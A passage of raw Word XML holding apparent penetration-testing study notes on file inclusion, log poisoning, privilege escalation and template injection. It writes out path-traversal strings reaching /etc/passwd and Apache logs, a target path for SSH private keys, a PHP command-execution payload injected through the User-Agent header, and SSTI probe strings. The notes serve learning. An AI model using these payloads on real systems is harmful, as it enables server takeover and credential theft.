    <w:p w14:paraId="4A74BF64" w14:textId="745D41D3" w:rsidR="00A13BFB" w:rsidRDefault="00A13BFB" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Importance of Arbitrary File reading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B32A66" w14:textId="75202B0D" w:rsidR="00A13BFB" w:rsidRDefault="000876D0" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>enumerate data to find sensitive info such as SSH keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E208E07" w14:textId="44429139" w:rsidR="000876D0" w:rsidRDefault="000876D0" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>once vulnerable parameter is found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CA0183" w14:textId="7EDAC0BE" w:rsidR="000876D0" w:rsidRDefault="000876D0" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>try to include passwd file on linux system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2921394D" w14:textId="02DC722A" w:rsidR="000876D0" w:rsidRDefault="000876D0" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">path traversal methods </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ../../../../etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E147266" w14:textId="49588AA4" w:rsidR="00BD29C7" w:rsidRDefault="00BD29C7" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>../ is one directory up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27586E42" w14:textId="65F0DF7E" w:rsidR="000876D0" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId116" w:anchor="basic-lfi-null-byte-double-encoding-and-other-tricks" w:history="1">
        <w:r w:rsidR="000876D0" w:rsidRPr="004C1D0B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/cyberheartmi9/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal#basic-lfi-null-byte-double-encoding-and-other-tricks</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="455DBE4E" w14:textId="27666DFF" w:rsidR="000876D0" w:rsidRDefault="000876D0" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>list of interesting files to try and check out</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F969E17" w14:textId="710ABB1D" w:rsidR="000876D0" w:rsidRDefault="000876D0" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">see if response is entries such as </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B93A07" w14:textId="19B4B8B3" w:rsidR="000876D0" w:rsidRDefault="000876D0" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>root, bin, daemon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451E756F" w14:textId="588F8A52" w:rsidR="000876D0" w:rsidRDefault="000876D0" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>nologins, bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BA5C69" w14:textId="2487B97C" w:rsidR="000876D0" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId117" w:history="1">
        <w:r w:rsidR="000876D0" w:rsidRPr="004C1D0B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.cyberciti.biz/faq/understanding-etcpasswd-file-format/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="73CE1A9C" w14:textId="099DFFAA" w:rsidR="000876D0" w:rsidRDefault="000876D0" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>once a username is found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D65E31E" w14:textId="1E3D24DE" w:rsidR="000876D0" w:rsidRDefault="000876D0" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">look for </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABC1604" w14:textId="473035E1" w:rsidR="000876D0" w:rsidRDefault="000876D0" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8FE1DD" w14:textId="2F5DBFCB" w:rsidR="000876D0" w:rsidRDefault="000876D0" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>important</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A939135" w14:textId="6800D733" w:rsidR="000876D0" w:rsidRDefault="000876D0" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>.bashrc for example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034CA476" w14:textId="69C71AD3" w:rsidR="00B51630" w:rsidRDefault="00B51630" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>/home/user/.ssh/id_rsa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165CFA3B" w14:textId="0C2AA670" w:rsidR="001F4518" w:rsidRDefault="001F4518" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>copy, save, CHMOD 600, ssh -i  into user profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3FD69A" w14:textId="758E7C1E" w:rsidR="009B5AC9" w:rsidRDefault="009B5AC9" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Log Poisoning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763C80FC" w14:textId="620C2239" w:rsidR="009B5AC9" w:rsidRDefault="009B5AC9" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>inject malicious input to the server log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0689D87A" w14:textId="3BBA879C" w:rsidR="009B5AC9" w:rsidRDefault="009B5AC9" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>directory should have read and execute permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF1517F" w14:textId="4E6BF1D8" w:rsidR="009B5AC9" w:rsidRDefault="009B5AC9" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>read apache log file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E29D87E" w14:textId="78D49F68" w:rsidR="009B5AC9" w:rsidRDefault="009B5AC9" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>../../../../../var/log/apache2/access.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF45311" w14:textId="391A86B6" w:rsidR="009B5AC9" w:rsidRDefault="009B5AC9" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Burpsuite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AECBB5" w14:textId="300F335E" w:rsidR="009B5AC9" w:rsidRDefault="009B5AC9" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>insert code in user agent field</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52326454" w14:textId="408BDAE0" w:rsidR="009B5AC9" w:rsidRDefault="009B5AC9" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Mozilla/5.0 &lt;?php system($_GET[‘lfi’]); ?&gt; Firefox/70.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBD2078" w14:textId="7008DCB6" w:rsidR="001F4518" w:rsidRDefault="001F4518" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Escalating your Privileges to Root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0831F2" w14:textId="40104979" w:rsidR="001F4518" w:rsidRDefault="001F4518" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>use sudo -l to find what can be root as user with root power</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDF7E19" w14:textId="7194972B" w:rsidR="001F4518" w:rsidRDefault="001F4518" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>GTFOBins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C783E49" w14:textId="5AC01DF9" w:rsidR="001F4518" w:rsidRDefault="001F4518" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>look for privesc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174ABAF1" w14:textId="4119AE34" w:rsidR="001F4518" w:rsidRDefault="001F4518" w:rsidP="001F4518">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A2FDF8A" w14:textId="58DF15EC" w:rsidR="001F4518" w:rsidRDefault="00A54F4E" w:rsidP="001F4518">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ZTH Obscure Web Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0158E9A9" w14:textId="194DEF88" w:rsidR="00A54F4E" w:rsidRDefault="00A54F4E" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>SSTI – Server Side Template Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEB040E" w14:textId="5CE45A13" w:rsidR="003743FA" w:rsidRDefault="003743FA" w:rsidP="003743FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>takes advantage of an insecure implementation of a template engine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F606AF6" w14:textId="31BD2635" w:rsidR="003743FA" w:rsidRDefault="003743FA" w:rsidP="003743FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>template engines allow a user to create static template files which can be re-used in an application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376D603C" w14:textId="406F9319" w:rsidR="00A54F4E" w:rsidRDefault="00A54F4E" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>user is able to pass a parameter that can control the template engine that is running on the server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136B09BD" w14:textId="4C80C6AB" w:rsidR="003743FA" w:rsidRDefault="003743FA" w:rsidP="003743FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>variable data is concatenated directly into the template, rather than passed in as data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03527E98" w14:textId="55FC9BEA" w:rsidR="003743FA" w:rsidRDefault="003743FA" w:rsidP="003743FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>this means whatever is supplied as user input will be interpreted by the engine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D3433C" w14:textId="56F63AAC" w:rsidR="00A54F4E" w:rsidRDefault="00A54F4E" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>can lead to XSS and RCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F35AA15" w14:textId="07E6A298" w:rsidR="003743FA" w:rsidRDefault="003743FA" w:rsidP="003743FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">server gets hijacked, not </w:t>
      </w:r>
      <w:r w:rsidR="00B2569C">
        <w:t>account on web server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16336FE5" w14:textId="6A9CDC99" w:rsidR="00A54F4E" w:rsidRDefault="00A54F4E" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>test for SSTI by using {{2+2}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC7D956" w14:textId="297B2B7D" w:rsidR="00B2569C" w:rsidRDefault="00B2569C" w:rsidP="00B2569C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75401AC5" w14:textId="1E334A88" w:rsidR="00B2569C" w:rsidRDefault="00B2569C" w:rsidP="00B2569C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Finding an Injection Point</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BF17A0" w14:textId="273A3FB3" w:rsidR="00B2569C" w:rsidRDefault="00B2569C" w:rsidP="00B2569C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>URL, input boxes, hidden inputs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AA76B2" w14:textId="14F3A581" w:rsidR="00B2569C" w:rsidRDefault="00B2569C" w:rsidP="00B2569C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Fuzzing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6220FA76" w14:textId="38A72E7B" w:rsidR="00B2569C" w:rsidRDefault="00B2569C" w:rsidP="00B2569C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>manually or with Burpsuite Sequencer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AEE68D" w14:textId="1812AB61" w:rsidR="00B2569C" w:rsidRDefault="00B2569C" w:rsidP="00B2569C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>manually</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F457471" w14:textId="2C3C4554" w:rsidR="00B2569C" w:rsidRDefault="00B2569C" w:rsidP="00B2569C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>most template engines use a similar character set for special functions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3C71A0" w14:textId="2B7A20EC" w:rsidR="00B2569C" w:rsidRDefault="00B2569C" w:rsidP="00B2569C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>${{&lt;%[%’”}}%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074DD39B" w14:textId="405876CB" w:rsidR="009F0893" w:rsidRDefault="009F0893" w:rsidP="00B2569C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>enter this one by one until error or characters disappear</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD21A72" w14:textId="2A95885D" w:rsidR="009F0893" w:rsidRDefault="009F0893" w:rsidP="009F0893">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ex. $, then ${, then ${{, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459D2AE1" w14:textId="320187F6" w:rsidR="009F0893" w:rsidRDefault="009F0893" w:rsidP="009F0893">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Identification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC9BCBC" w14:textId="3ADDE994" w:rsidR="009F0893" w:rsidRDefault="009F0893" w:rsidP="009F0893">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ID what template engine is being used (</w:t>
      </w:r>
      <w:r w:rsidR="00450981">
        <w:t>Green = Expression Evaluated, Red = expression shown as input)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C82BB9" w14:textId="2433EE50" w:rsidR="009F0893" w:rsidRDefault="009F0893" w:rsidP="009F0893">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="774A44A8" wp14:editId="05C60298">
            <wp:extent cx="5057775" cy="2892766"/>
            <wp:effectExtent l="0" t="0" r="0" b="317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8">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5057775" cy="2892766"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A2169F" w14:textId="1F80059A" w:rsidR="00450981" w:rsidRDefault="00450981" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Syntax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D63A89C" w14:textId="314BB9BD" w:rsidR="00450981" w:rsidRDefault="00450981" w:rsidP="00450981">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Learn syntax of given template engine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412151EA" w14:textId="1314CCB8" w:rsidR="00450981" w:rsidRDefault="007A6E65" w:rsidP="00450981">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId119" w:history="1">
        <w:r w:rsidR="00450981" w:rsidRPr="00062852">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://jinja.palletsprojects.com/en/2.11.x/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4DF16D9E" w14:textId="4A8EA097" w:rsidR="00450981" w:rsidRDefault="007A6E65" w:rsidP="00450981">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId120" w:anchor="jinja2.Environment" w:history="1">
        <w:r w:rsidR="00450981" w:rsidRPr="00062852">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://jinja.palletsprojects.com/en/2.11.x/api/#jinja2.Environment</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="19FB8BBA" w14:textId="6AC434FB" w:rsidR="00450981" w:rsidRDefault="00450981" w:rsidP="00450981">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
